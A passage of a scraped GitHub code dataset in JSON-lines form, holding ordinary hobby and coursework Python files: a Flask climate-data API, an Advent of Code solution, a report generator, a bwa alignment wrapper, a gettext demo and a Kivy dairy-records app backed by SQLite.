automap_base()\n\n# reflect the tables\nBase.prepare(engine, reflect=True)\n\n\n# Save references to each table\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\n# Create our session (link) from Python to the DB\nsession = Session(engine)\n\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\n\n#################################################\n# Flask Routes\n#################################################\n\n@app.route(\"/\")\ndef home():\n \"\"\"List all available api routes.\"\"\"\n return (\n f\"Welcome to the Climate App API!
\"\n f\"Available Routes:
\"\n f\"/api/v1.0/precipitation
\"\n f\"/api/v1.0/stations
\"\n f\"/api/v1.0/tobs
\"\n f\"/api/v1.0/<start>
\" # change made here\n f\"/api/v1.0/<start>/<end>
\" # and here\n )\n\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n # Calculate the date one year from the last date in data set.\n last_date = session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n one_year_ago_date = dt.date(int(last_date[0][:4]), int(last_date[0][5:7]), int(last_date[0][8:])) - dt.timedelta(days=365)\n\n # Perform a query to retrieve the data and precipitation scores\n prcp_data = session.query(Measurement.date, Measurement.prcp).\\\n filter(Measurement.date >= one_year_ago_date).all()\n\n # Convert the query results to a dictionary using date as the key and prcp as the value\n prcp_data_dict = {date: prcp for date, prcp in prcp_data}\n\n # Return the JSON representation of dictionary\n return jsonify(prcp_data_dict)\n\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n # Query to get all unique stations\n stations = session.query(Station.station).all()\n\n # Convert the query results to a list\n stations_list = list(np.ravel(stations))\n\n # Return the JSON representation of your list\n return jsonify(stations_list)\n\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n # Get the last date in the database\n last_date = session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n\n # Calculate the date one year ago\n one_year_ago = dt.date(int(last_date[0][:4]), int(last_date[0][5:7]), int(last_date[0][8:])) - dt.timedelta(days=365)\n\n # Query to get the most active station\n most_active_station = session.query(Measurement.station).\\\n group_by(Measurement.station).\\\n order_by(func.count().desc()).\\\n first()\n\n # Query to get the last year of temperature observation data for the most active station\n tobs_data = session.query(Measurement.date, Measurement.tobs).\\\n filter(Measurement.station == most_active_station.station).\\\n filter(Measurement.date >= one_year_ago).\\\n all()\n\n # Convert query results to a list of dictionaries\n tobs_list = []\n for date, tobs in tobs_data:\n tobs_dict = {}\n tobs_dict[date] = tobs\n tobs_list.append(tobs_dict)\n\n # Return the JSON representation of your list\n return jsonify(tobs_list)\n\n\n\n@app.route(\"/api/v1.0/\")\ndef start_date(start):\n # Query to get the minimum, average, and maximum temperatures for all dates greater than or equal to the start date\n temp_stats = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\\\n filter(Measurement.date >= start).all()\n\n # Convert the query results to a list\n temp_list = list(np.ravel(temp_stats))\n\n # Return the JSON representation of the list\n return jsonify(temp_list)\n\n\n@app.route(\"/api/v1.0//\")\ndef start_end_date(start, end):\n # Query to get the minimum, average, and maximum temperatures for a date range\n temp_stats = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\\\n filter(Measurement.date >= start).filter(Measurement.date <= end).all()\n\n # Create a dictionary to hold the data\n temp_dict = {\n \"Minimum Temp\": temp_stats[0][0],\n \"Average Temp\": temp_stats[0][1],\n \"Maximum Temp\": temp_stats[0][2]\n }\n\n # Return the JSON representation of the dictionary\n return jsonify(temp_dict)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"Windowz888/sqlalchemy-challenge","sub_path":"SurfsUp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22979425207","text":"import sys\n\n\ndef parse(puzzle):\n questions = []\n for line in puzzle:\n if line.split():\n questions.append(line.strip(\"\\n\"))\n else:\n yield questions\n questions = []\n\n\ndef solution1(puzzleinput):\n count = 0\n for res in puzzleinput:\n count = count + len(set(''.join(res)))\n\n # must be some stupid comprehension for this\n print(count)\n\n\ndef solution2(puzzleinput):\n count = 0\n for res in puzzleinput:\n count = count + len(''.join(set(res[0]).intersection(*res)))\n\n print(count)\n\n\nanswers = list(parse(sys.stdin))\nsolution1(answers)\nsolution2(answers)\n","repo_name":"Webrow/aoc2020","sub_path":"6/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37591661222","text":"import subprocess\nfrom datetime import datetime\nfrom BLL import kit_bll, material_bll, tela_bll, mov_material_bll\nfrom Ferramentas import variaveis_globais\n\n\ndef gerar_relatorio_kit(prms=''):\n e = 'OK'\n bll = kit_bll.KitBll()\n r = bll.retornar_dados('material', '%'+prms+'%')\n\n nome_arquivo = 'Relatório de Kits'\n\n try:\n arquivo = open( variaveis_globais.CAMINHO_REL+nome_arquivo+'.txt', 'w')\n \n arquivo.write('{:>10} {:>70}\\n\\n\\n'.format(datetime.today().strftime('%H:%M:%S %d/%m/%Y'), 'Resp.: '+variaveis_globais.usu_usuario))\n arquivo.write('| {:^6} | {:^8} | {:^76} |\\n'.format('CÓDIGO', 'MATERIAL', 'DESCRIÇÃO'))\n arquivo.write('+'+'-'*8+'+'+'-'*10+'+'+'-'*78+'+\\n')\n for i in r:\n arquivo.write('| {:^6} | {:^8} | {:^76} |\\n'.format(i[1],str(i[2]), i[4]))\n\n arquivo.close()\n\n subprocess.Popen(variaveis_globais.CAMINHO_REL+nome_arquivo+'.txt', shell=True)\n \n except Exception as ex:\n e = Exception(str(ex))\n return e\n \ndef gerar_relatorio_material(prms=''):\n e = 'OK'\n bll = material_bll.MaterialBll()\n r = bll.retornar_dados('tipo', '%'+prms+'%')\n\n nome_arquivo = 'Relatório de Materiais'\n\n try:\n arquivo = open(variaveis_globais.CAMINHO_REL+nome_arquivo+'.txt', 'w')\n\n arquivo.write('{:>10} {:>70}\\n\\n\\n'.format(datetime.today().strftime('%H:%M:%S %d/%m/%Y'), 'Resp.: '+variaveis_globais.usu_usuario))\n arquivo.write('| {:^6} | {:^8} | {:^42} | {:^5} | {:^6} | {:^5} | {:^6} |\\n'.format('CÓDIGO', 'TIPO', 'DESCRIÇÃO', 'RET.', 'IMPRE.', 'IMP.', 'SALDO'))\n arquivo.write('+'+'-'*8+'+'+'-'*10+'+'+'-'*44+'+'+'-'*7+'+'+'-'*8+'+'+'-'*7+'+'+'-'*8+'+\\n')\n\n for i in r:\n arquivo.write('| {:^6} | {:^8} | {:^42} | {:^5} | {:^6} | {:^5} | {:^6} |\\n'.format(i[1], i[2], i[3][:42], i[4], i[5], i[6], i[7]))\n \n arquivo.close()\n\n subprocess.Popen(variaveis_globais.CAMINHO_REL+nome_arquivo+'.txt', shell=True)\n #subprocess.Popen(['notepad', caminho+nome_arquivo+'.txt'])\n\n # Pode abrir o bloco de nota desse jeito também\n #os.system('notepad '+caminho+'Relatório de Material.txt')\n \n except Exception as ex:\n e = Exception(str(ex))\n return e\n\ndef gerar_relatorio_tela(tipo='',modelo=''):\n e = 'OK'\n bll = tela_bll.TelaBll()\n r = bll.retornar_dados('tipo+modelo+descricao', ('%'+tipo+'%', '%'+modelo+'%', '%'+''+'%'))\n\n nome_arquivo = 'Relatório de Telas'\n\n try:\n arquivo = open(variaveis_globais.CAMINHO_REL+nome_arquivo+'.txt', 'w')\n\n arquivo.write('{:>10} {:>70}\\n\\n'.format(datetime.today().strftime('%H:%M:%S %d/%m/%Y'), 'Resp.: '+variaveis_globais.usu_usuario))\n arquivo.write('{:>20} {:>20}\\n\\n'.format(tipo, modelo))\n arquivo.write('+'+'-'*98+'+\\n')\n cont = 0\n\n for i in r:\n part_a = '| ID: {:<10} Tipo: {:<10} Modelo: {:<10}'.format(i[0], i[1], i[2])\n conte_a = 99 - len(part_a)\n\n part_b = '| Descrição: {:<5} Prateleira(s): {:<5}'.format(i[3][:52], i[4][:15])\n b = len(part_b)\n if b >= 0:\n conte_b = 99 - b\n else:\n conte_b = 100\n\n arquivo.write('{} {:>{}}\\n'.format(part_a, ' |', conte_a))\n arquivo.write('{} {:>{}}\\n'.format(part_b, ' |', conte_b))\n arquivo.write('+'+'-'*98+'+\\n')\n cont += 1\n if cont == 25:\n cont = 0\n arquivo.write('\\n\\n\\n\\n')\n arquivo.write('+'+'-'*98+'+\\n')\n\n arquivo.close()\n\n subprocess.Popen(variaveis_globais.CAMINHO_REL+nome_arquivo+'.txt', shell=True)\n\n except Exception as ex:\n e = Exception(str(ex))\n return e\n\ndef gerar_relatorio_mov_material(dt_inicial,dt_final,tipo=''):\n e = 'OK'\n bll = mov_material_bll.MovMaterialBll()\n\n r = bll.retornar_dados('dat+tip', (dt_inicial, dt_final, '%'+tipo+'%'))\n\n nome_arquivo = 'Relatório de Mov. Materiais'\n\n try:\n arquivo = open(variaveis_globais.CAMINHO_REL+nome_arquivo+'.txt', 'w')\n\n #arquivo.write('-'*100+'\\n') # Adequar em uma página\n arquivo.write('{:>10} {:>70}\\n{:>50}\\n\\n'.format(datetime.today().strftime('%H:%M:%S %d/%m/%Y'), 'Resp.: '+variaveis_globais.usu_usuario, 'Período: '+dt_inicial.strftime('%d/%m/%Y')+' á '+dt_final.strftime('%d/%m/%Y')))\n arquivo.write('| {:^6} | {:^26} | {:^10} | {:^10} | {:^10} | {:^6} | {:^10} |\\n'.format('CÓDIGO', 'DESCRIÇÃO', 'TIPO', 'ORIGEM', 'DESTINO', 'QTD', 'DATA'))\n arquivo.write('+'+'-'*8+'+'+'-'*28+'+'+'-'*12+'+'+'-'*12+'+'+'-'*12+'+'+'-'*8+'+'+'-'*12+'+\\n')\n\n for i in r:\n arquivo.write('| {:^6} | {:^26} | {:^10} | {:^10} | {:^10} | {:^6} | {:^10} |\\n'.format(i[1],i[2][:26],i[3][:10],i[4][:10],i[5][:10],str(i[6]),i[7]))\n\n arquivo.close()\n\n #subprocess.Popen(['notepad',caminho+nome_arquivo+'.txt'])\n subprocess.Popen(variaveis_globais.CAMINHO_REL+nome_arquivo+'.txt', shell=True)\n except Exception as ex:\n e = Exception(str(ex))\n return e\n","repo_name":"Valterlande/ProjetoTigre","sub_path":"Ferramentas/gerar_relatorios.py","file_name":"gerar_relatorios.py","file_ext":"py","file_size_in_byte":5105,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32834059892","text":"#!/usr/local/Anaconda/envs/py3.4.3/bin/python\n\nimport argparse\nimport subprocess\n\nparser = argparse.ArgumentParser(description= \\\n\t\"Takes in fastq.gz files from Casey panels, \\\n\taligns with bwa-mem to 1000g phaseII hs37d5 with \\\n\tread group info \\\n\tRequires samtools/1.3 and bwa to be loaded \\\n\t\\\n\tInvoke script with sbatch --mem=30G --cpus-per-task 10 \\\n\t\\\n\tExample (exome): \\\n \t\tsbatch --mem=30G --cpus-per-task 10 this_script.py A_BAM_FILE_001.bam\")\nparser.add_argument('forward', help = 'Forward fastq reads')\nparser.add_argument('reverse', help = 'Reverse fastq reads')\nparser.add_argument('CaseyID', help = 'Casey sample ID, e.g. 15-00414')\nparser.add_argument('panel', help = 'Casey Panel')\nargs = parser.parse_args()\nforward = args.forward\nreverse = args.reverse\ncaseyID = args.CaseyID\npanel = args.panel\n\n# ID is basically the NISC file name for the fastq (minus the .fq at the end)\nID = 'ID:' + forward.split('.fastq')[0]\n# SM is the bam file name or sample name. Needs to the same for each sample!\nSM = 'SM:' + caseyID + '_' + panel\n# LB is the library\nLB = 'LB:' + forward.split('.fastq')[0]\nPL = 'PL:Illumina\\\\\" \\\\'\n\nOutput = SM + '.bwa-mem.b37.bam'\n# Joins all together\nRG_core = '\\\\\\\\t'.join(['\\\\\"\\@RG',ID, SM, LB, PL])\n\n\n# bwa alignment\nprint(\"BWA run beginning\")\nrun_bwa = ('/home/mcgaugheyd/bin/exome_workflow_v02/run_bwa-mem_hg37d5.sh ' +\n forward + ' ' + reverse + ' ' + \n '\\\\@RG\\\\\\\\t' + ID + '\\\\\\\\t' + SM + '\\\\\\\\t' + LB + '\\\\\\\\t' + 'PL:Illumina ' +\n caseyID + '/' + caseyID + '_' + panel + '.bwa-mem.b37.bam')\nprint(run_bwa)\nsubprocess.check_call(run_bwa, shell=True)\nprint(\"All done!\")\n","repo_name":"davemcg/NGS_genotype_calling","sub_path":"casey_workflow_v01/align_with_bwa.py","file_name":"align_with_bwa.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"14799345022","text":"#!/usr/bin/env python\n\nimport gettext\nimport random \n\n\nif __name__ == \"__main__\":\n trans = gettext.translation(\"meinprogramm\", \"locale\", [\"de\"])\n trans.install()\n\n werte = []\n\n while True:\n w = input(_(\"Please enter a value: \"))\n if not w:\n break\n\n werte.append(w)\n\n print(_(\"The random choice is {}\").format(random.choice(werte)))\n","repo_name":"Eskimo-SVD/Oliver_private_Bude","sub_path":"Python-Buch/35_Distribution_von_Python-Projekten/Lokalisierung_von_Programmen/beispiel_gettext.py","file_name":"beispiel_gettext.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"14744622437","text":"from kivy.app import App\r\nfrom kivy.uix.boxlayout import BoxLayout\r\nfrom kivy.uix.gridlayout import GridLayout\r\nfrom kivy.uix.popup import Popup \r\nfrom kivy.uix.textinput import TextInput\r\nfrom kivy.uix.scrollview import ScrollView\r\nfrom kivy.uix.label import Label\r\nfrom kivy.uix.button import Button\r\nfrom kivy.core.window import Window\r\nfrom kivy.lang import Builder\r\nimport os\r\nfrom kivy.uix.screenmanager import Screen,ScreenManager\r\nfrom kivy.utils import get_color_from_hex\r\nimport sqlite3 \r\nimport datetime\r\nimport pandas as pd\r\n\r\n# global conn1,cur1,Date_text \r\nDate_text = datetime.date.today()\r\n\r\nconn1 =sqlite3.connect(\"Today.db\")\r\n\r\ncur1 =conn1.cursor()\r\ncur1.execute('''\r\n CREATE TABLE IF NOT EXISTS info(Id int ,Date text,Name text,Fat int,Qunatity int ,Rate int ,Total int)''')\r\n\r\n# crete database for store programmer details entry storege\r\n\r\n\r\n\r\nconninfo =sqlite3.connect(\"Information.db\")\r\ncorinfo =conninfo.cursor()\r\ncorinfo.execute('''CREATE TABLE IF NOT EXISTS info(Id int ,Date text)''')\r\n# corinfo.execute('''INSERT INTO info(Id,Date ) VALUES (?,?)''',(1,Date_text)) \r\nresult =corinfo.execute('''select Date from info''')\r\nla =[]\r\nfor i in result:\r\n la.append(i[0])\r\n\r\nif len(la)==0:\r\n # corinfo.execute('''CREATE TABLE IF NOT EXISTS info(Id int ,Date text)''')\r\n corinfo.execute('''INSERT INTO info(Id,Date ) VALUES (?,?)''',(1,Date_text)) \r\n \r\nelse:\r\n Date_text =str(Date_text)\r\n if la[0]==Date_text:\r\n pass\r\n else:\r\n cur1.execute(\"drop table info\")\r\n cur1.execute('''\r\n CREATE TABLE IF NOT EXISTS info(Id int,Date text,Name text,Fat int,Qunatity int ,Rate int ,Total int)''')\r\n corinfo.execute(\"drop table info\")\r\n corinfo.execute('''CREATE TABLE IF NOT EXISTS info(Id int ,Date text)''')\r\n corinfo.execute('''INSERT INTO info(Id,Date ) VALUES (?,?)''',(1,Date_text)) \r\nconninfo.commit()\r\nconninfo.close()\r\nconn1.commit()\r\nconn1.close() \r\n\r\n \r\n# crete database for store a/c holder details storege\r\nconn =sqlite3.connect(\"User_Names.db\") \r\ncur =conn.cursor()\r\ncur.execute('''\r\n CREATE TABLE IF NOT EXISTS info(Id int auto_increment,Date text,Name text,Address text,phone int)''')\r\n \r\nconn.commit()\r\nconn.close() \r\nWindow.clearcolor = get_color_from_hex('#FFC133')\r\nWindow.fullscreen =False\r\n\r\nBuilder.load_file(\"Project.kv\")\r\n\r\nclass Main_Window(Screen):\r\n def __init__(self,**kwags):\r\n super().__init__(**kwags)\r\n\r\nclass Entry_window(Screen):\r\n def __init__(self,**kwags):\r\n super().__init__(**kwags)\r\n\r\n def Total(self):\r\n try:\r\n Fat =int(self.ids.Fat_text.text) \r\n Quantity =int(self.ids.Quantity_text.text)\r\n Rate=int(self.ids.Rate_text.text) \r\n Total =(Fat*Quantity*Rate)\r\n Total =str(Total/65)\r\n self.ids.Total_text.text =Total\r\n except:\r\n warning(\"INVALID ENTRY\")\r\n \r\n def New(self):\r\n self.ids.Fat_text.text =\"\"\r\n self.ids.Quantity_text.text =\"\"\r\n self.ids.Rate_text.text =\"\" \r\n self.ids.user_text.text =\"\"\r\n self.ids.Total_text.text =\"\" \r\n \r\n\r\n def Save(self):\r\n \r\n try:\r\n if self.ids.Fat_text.text!=\"\" and self.ids.Quantity_text.text!=\"\"and self.ids.Rate_text.text!=\"\" and self.ids.user_text.text!=\"\" :\r\n \r\n User_Name =self.ids.user_text.text\r\n User_Name =User_Name.lower() \r\n User_Name =User_Name.capitalize()\r\n Fat =int(self.ids.Fat_text.text) \r\n Quantity =int(self.ids.Quantity_text.text)\r\n Rate=int(self.ids.Rate_text.text) \r\n Total =(Fat*Quantity*Rate)\r\n Total =int(Total/65)\r\n self.ids.Total_text.text =str(Total) #print total price with save button\r\n except:\r\n warning(\"INVALID ENTRY\")\r\n \r\n try:\r\n conncheck =sqlite3.connect(\"User_Names.db\") \r\n curcheck =conncheck .cursor()\r\n result =curcheck .execute('''\r\n select Name from info''')\r\n la =[] \r\n for i in result:\r\n la.append(i[0])\r\n if User_Name in la:\r\n conncheck.commit()\r\n conncheck.close() \r\n\r\n layout = GridLayout(cols = 1, padding = 10) \r\n popupLabel = Label(text =\"INFO. WILL BE......\") \r\n choiceButton = Button(text = \"Save\",bold=\"True\",font_size=20) \r\n closeButton = Button(text = \"Close\",bold=\"True\",font_size=20) \r\n layout.add_widget(popupLabel) \r\n layout.add_widget(choiceButton) \r\n layout.add_widget(closeButton) \r\n popup = Popup(title ='SURBHI DAIRY', content = layout,size_hint =(None, None), size =(300,300)) \r\n popup.open() \r\n closeButton.bind(on_press = popup.dismiss)\r\n choiceButton.bind(on_release =popup.dismiss ) \r\n choiceButton.bind(on_press = save_data(User_Name,Fat,Total,Rate,Quantity)) #call save_data function for info. saveing ,pass variable for data \r\n\r\n else:\r\n warning(\"USER NOT RAGISTERD\")\r\n \r\n except:\r\n pass\r\n\r\n\r\ndef save_data(User_Name,Fat,Total,Rate,Quantity):#defination of save_data function for info. saveing ,pass variable for data\r\n global Date_text \r\n conn =sqlite3.connect(f\"{User_Name }.db\")\r\n cur =conn.cursor()\r\n cur.execute('''\r\n CREATE TABLE IF NOT EXISTS info(Id integer ,Date text,Name text,Fat int,Qunatity int ,Rate int ,Total int)''')\r\n r =cur.execute(\"select id from info\")\r\n lw =[]\r\n for i in r:\r\n lw.append(i[0]) \r\n if len(lw) ==0:\r\n cur.execute('''INSERT INTO info(Id,Date ,Name ,Fat ,Qunatity ,Rate ,Total ) VALUES (?,?,?,?,?,?,?)''',(1,Date_text,User_Name,Fat,Quantity,Rate,Total)) \r\n else:\r\n a=lw.pop()\r\n a=a+1\r\n cur.execute('''INSERT INTO info(Id ,Date ,Name ,Fat ,Qunatity ,Rate ,Total ) VALUES (?,?,?,?,?,?,?)''',(a,Date_text,User_Name,Fat,Quantity,Rate,Total)) \r\n\r\n conn.commit()\r\n conn.close()\r\n \r\n conntoday =sqlite3.connect(\"Today.db\") \r\n curtoday =conntoday.cursor() \r\n re =curtoday.execute(\"select Id from info\")\r\n ls =[]\r\n for i in re:\r\n ls.append(i[0])\r\n if len(ls)==0:\r\n curtoday.execute('''\r\n CREATE TABLE IF NOT EXISTS info(Id int,Date text,Name text,Fat int,Qunatity int ,Rate int ,Total int)''')\r\n curtoday.execute('''INSERT INTO info(Id ,Date ,Name ,Fat ,Qunatity ,Rate ,Total ) VALUES (?,?,?,?,?,?,?)''',(1,Date_text,User_Name,Fat,Quantity,Rate,Total)) \r\n else:\r\n a =ls.pop()\r\n a=a+1\r\n curtoday.execute('''\r\n CREATE TABLE IF NOT EXISTS info(Id int,Date text,Name text,Fat int,Qunatity int ,Rate int ,Total int)''')\r\n curtoday.execute('''INSERT INTO info(Id ,Date ,Name ,Fat ,Qunatity ,Rate ,Total ) VALUES (?,?,?,?,?,?,?)''',(a,Date_text,User_Name,Fat,Quantity,Rate,Total)) \r\n # curtoday.execute('''\r\n # CREATE TABLE IF NOT EXISTS info(Id int ,Date text,Name text,Fat int,Qunatity int ,Rate int ,Total int)''')\r\n # curtoday.execute('''INSERT INTO info(Date ,Name ,Fat ,Qunatity ,Rate ,Total ) VALUES (?,?,?,?,?,?,?)''',(a,Date_text,User_Name,Fat,Quantity,Rate,Total)) \r\n\r\n conntoday.commit()\r\n conntoday.close()\r\n \r\n \r\n \r\n\r\nclass See_window(Screen):\r\n def __init__(self,**kwags):\r\n super().__init__(**kwags)\r\n\r\n def Today_Entry(self):\r\n try:\r\n conn =sqlite3.connect(f\"Today.db\")\r\n cur =conn.cursor()\r\n self.ids.text_area_today_database.text =\"\"\r\n cur.execute(\"select * from info\")\r\n for i in cur.fetchall():\r\n self.ids.text_area_today_database.insert_text(\"\\n \", from_undo=False)\r\n self.ids.text_area_today_database.insert_text(f'''\\t{i[0]}\\t\\t{i[1]}\\t\\t{i[2]} \\t\\t{i[3]}\\t\\t\\t{i[4]}\\t\\t\\t\\t{i[5]}\\t\\t\\t{i[6]}''', from_undo=False)\r\n conn.commit() \r\n conn.close()\r\n except:\r\n warning(\"SOMETHING ROUNG\") \r\n \r\n \r\n \r\n def See_data_text(self):\r\n try:\r\n a=self.ids.See_data_text.text\r\n if a!=\"\":\r\n if '-' in a:\r\n input_value =a.split(\"-\")\r\n length =len(input_value)\r\n if length==3:\r\n try:\r\n conn =sqlite3.connect(f\"{input_value[0]}.db\")\r\n cur =conn.cursor()\r\n self.ids.text_area_today_database.text =\"\"\r\n cur.execute(f\"select * from {input_value[1]+input_value[2]}\")\r\n for i in cur.fetchall():\r\n self.ids.text_area_today_database.insert_text(\"\\n \", from_undo=False)\r\n self.ids.text_area_today_database.insert_text(f'''\\t\\t\\t{i[0]}\\t\\t\\t\\t{i[1]}\\t\\t{i[2]} \\t\\t{i[3]}\\t\\t\\t{i[4]}\\t\\t\\t\\t{i[5]}\\t\\t\\t{i[6]}''', from_undo=False)\r\n conn.commit() \r\n conn.close()\r\n except:\r\n pass\r\n else:\r\n conn =sqlite3.connect(f\"{a}.db\")\r\n cur =conn.cursor()\r\n self.ids.text_area_today_database.text =\"\"\r\n cur.execute(\"select * from info\")\r\n for i in cur.fetchall():\r\n self.ids.text_area_today_database.insert_text(\"\\n \", from_undo=False)\r\n self.ids.text_area_today_database.insert_text(f'''\\t\\t\\t{i[0]}\\t\\t\\t\\t{i[1]}\\t\\t{i[2]} \\t\\t{i[3]}\\t\\t\\t{i[4]}\\t\\t\\t\\t{i[5]}\\t\\t\\t{i[6]}''', from_undo=False)\r\n conn.commit() \r\n conn.close()\r\n \r\n except:\r\n pass \r\n \r\n \r\n \r\n def edit(self):\r\n database_name =self.ids.See_data_text.text\r\n \r\n database_name=database_name.lower()\r\n database_name=database_name.capitalize()\r\n if database_name!=\"\":\r\n layout =BoxLayout(orientation='vertical',spacing =20,padding =20)\r\n popupLabel = Label(text = \"old Detals\",bold =True,font_size=20)\r\n layout.add_widget(popupLabel)\r\n line_no =TextInput(id=\"line_num\",font_size=20,multiline =False,hint_text=\"Line Number\",size_hint_y=None,height=40,size_hint_x=None,width =300)\r\n layout.add_widget(line_no)\r\n popupLabel2 = Label(text = \"New Details\",bold =True,font_size=20) \r\n layout.add_widget(popupLabel2)\r\n date =TextInput(font_size=20,multiline =False,hint_text=\"Date\",size_hint_y=None,height=40,size_hint_x=None,width =300)\r\n layout.add_widget(date)\r\n name =TextInput(font_size=20,multiline =False,hint_text=\" Name\",size_hint_y=None,height=40,size_hint_x=None,width =300)\r\n layout.add_widget(name)\r\n fat =TextInput(font_size=20,multiline =False,hint_text=\"FAT\",size_hint_y=None,height=40,size_hint_x=None,width =300)\r\n layout.add_widget(fat)\r\n quantity =TextInput(font_size=20,multiline =False,hint_text=\" Quantity\",size_hint_y=None,height=40,size_hint_x=None,width =300)\r\n layout.add_widget(quantity)\r\n rate =TextInput(font_size=20,multiline =False,hint_text=\" Rate\",size_hint_y=None,height=40,size_hint_x=None,width =300)\r\n layout.add_widget(rate)\r\n choiceButton = Button(text = \"Save\",bold=\"True\",font_size=20,size_hint_x=None,width =200) \r\n layout.add_widget(choiceButton) \r\n closeButton = Button(text = \"Close\",bold=\"True\",font_size=20,size_hint_x=None,width =200) \r\n layout.add_widget(closeButton) \r\n popup = Popup(title ='SURBHI DAIRY', content = layout,size_hint =(None, None), size =(1300,800)) \r\n popup.open() \r\n closeButton.bind(on_press = popup.dismiss)\r\n choiceButton.bind(on_release = popup.dismiss)\r\n choiceButton.bind(on_press= lambda x:edit_1(database_name,date,fat,quantity,rate,name,line_no))\r\n\r\n\r\n\r\n\r\n\r\n\r\n def delete(self):\r\n a=self.ids.See_data_text.text\r\n if a!=\"\":\r\n if '-' in a:\r\n b,b1 =spliter(a)\r\n conn =sqlite3.connect(\"User_Names.db\")\r\n cur =conn.cursor() \r\n r =conn.execute(\"select Name from info\")\r\n ls =[]\r\n for i in r:\r\n ls.append(i[0])\r\n if b1 in ls:\r\n # global date2\r\n layout = BoxLayout(orientation='vertical',spacing =20) \r\n date2 =TextInput(id='line',font_size=20,multiline =False,hint_text=\"Enter Id NUmber\",size_hint_y=None,height=40,size_hint_x=None,width =350)\r\n okButton = Button(text = \"Done\",bold=\"True\",font_size=20,size_hint_y=None,height=40,size_hint_x=None,width =100) \r\n closeButton = Button(text = \"Close\",bold=\"True\",font_size=20,size_hint_y=None,height=40,size_hint_x=None,width =100) \r\n layout.add_widget(date2) \r\n layout.add_widget(okButton) \r\n layout.add_widget(closeButton) \r\n popup = Popup(title ='SURBHI DAIRY', content = layout,size_hint =(None, None), size =(450,350) ) \r\n popup.open() \r\n closeButton.bind(on_press = popup.dismiss)\r\n okButton.bind(on_release = popup.dismiss)\r\n okButton.bind(on_press=lambda x:delete_Entry_1(date2)) \r\n \r\n\r\n else:\r\n warning(\"This Is Not A Valid User \") \r\n\r\n conn.commit()\r\n conn.close()\r\n else:\r\n \r\n layout = BoxLayout(orientation='vertical',spacing =20) \r\n date1 =TextInput(id='line',font_size=20,multiline =False,hint_text=\"Enter Id NUmber\",size_hint_y=None,height=40,size_hint_x=None,width =350)\r\n okButton = Button(text = \"Done\",bold=\"True\",font_size=20,size_hint_y=None,height=40,size_hint_x=None,width =100) \r\n closeButton = Button(text = \"Close\",bold=\"True\",font_size=20,size_hint_y=None,height=40,size_hint_x=None,width =100) \r\n layout.add_widget(date1) \r\n layout.add_widget(okButton) \r\n layout.add_widget(closeButton) \r\n popup = Popup(title ='SURBHI DAIRY', content = layout,size_hint =(None, None), size =(450,350) ) \r\n popup.open() \r\n closeButton.bind(on_press = popup.dismiss)\r\n okButton.bind(on_release = popup.dismiss)\r\n okButton.bind(on_press=lambda x:delete_Entry_2(a,date1)) \r\n\r\n def user_list(self):\r\n try:\r\n layout = BoxLayout(orientation='vertical',spacing =20) \r\n layout_2=GridLayout( size_hint_y= None,height= 25,cols= 5)\r\n l1=Label(text=\"ID\",font_size=20)\r\n l2=Label(text=\"DATE\",font_size=20)\r\n l3=Label(text=\"NAME\",font_size=20)\r\n l4=Label(text=\"ADDRESS\",font_size=20)\r\n l5=Label(text=\"PH.NO.\",font_size=20)\r\n layout_2.add_widget(l1)\r\n layout_2.add_widget(l2)\r\n layout_2.add_widget(l3)\r\n layout_2.add_widget(l4)\r\n layout_2.add_widget(l5)\r\n layout.add_widget(layout_2) \r\n # root = ScrollView(size_hint=(0.8, 0.5))\r\n data=TextInput(font_size=20)\r\n # data.text=\"\"\r\n # root.add_widget(data)\r\n closeButton = Button(text = \"Close\",bold=\"True\",font_size=20,size_hint_y=None,height=40,size_hint_x=None,width =100) \r\n layout.add_widget(data) \r\n layout.add_widget(closeButton) \r\n popup = Popup(title ='SURBHI DAIRY', content = layout,size_hint =(None, None), size =(1000,600) ) \r\n popup.open() \r\n x=show_user_list(data) \r\n closeButton.bind(on_press = popup.dismiss)\r\n except:\r\n warning(\"Something Roung\")\r\n def print(self):\r\n print_file_name=self.ids.See_data_text.text\r\n if print_file_name!=\"\":\r\n layout = BoxLayout(orientation='vertical',spacing =20) \r\n date1=Label(text=\"Are You Sure To Print \",font_size=20)\r\n okButton = Button(text = \"Done\",bold=\"True\",font_size=20,size_hint_y=None,height=40,size_hint_x=None,width =100) \r\n closeButton = Button(text = \"Close\",bold=\"True\",font_size=20,size_hint_y=None,height=40,size_hint_x=None,width =100) \r\n layout.add_widget(date1) \r\n layout.add_widget(okButton) \r\n layout.add_widget(closeButton) \r\n popup = Popup(title ='SURBHI DAIRY', content = layout,size_hint =(None, None), size =(250,250) ) \r\n popup.open() \r\n closeButton.bind(on_press = popup.dismiss)\r\n okButton.bind(on_release = popup.dismiss)\r\n # okButton.bind(on_press=self.delete_crete())\r\n okButton.bind(on_press=lambda x:print_1(print_file_name))\r\n\r\ndef show_user_list(data):\r\n try:\r\n conn =sqlite3.connect(f\"User_Names.db\")\r\n cur =conn.cursor()\r\n \r\n data.text=\" bbc cbnx\"\r\n r =cur.execute(\"select * from info\")\r\n data.text=\" \"\r\n for i in cur.fetchall():\r\n data.insert_text(\"\\n \")\r\n data.insert_text(f'''\\t\\t{i[0]}\\t\\t\\t{i[1]}\\t\\t{i[2]} 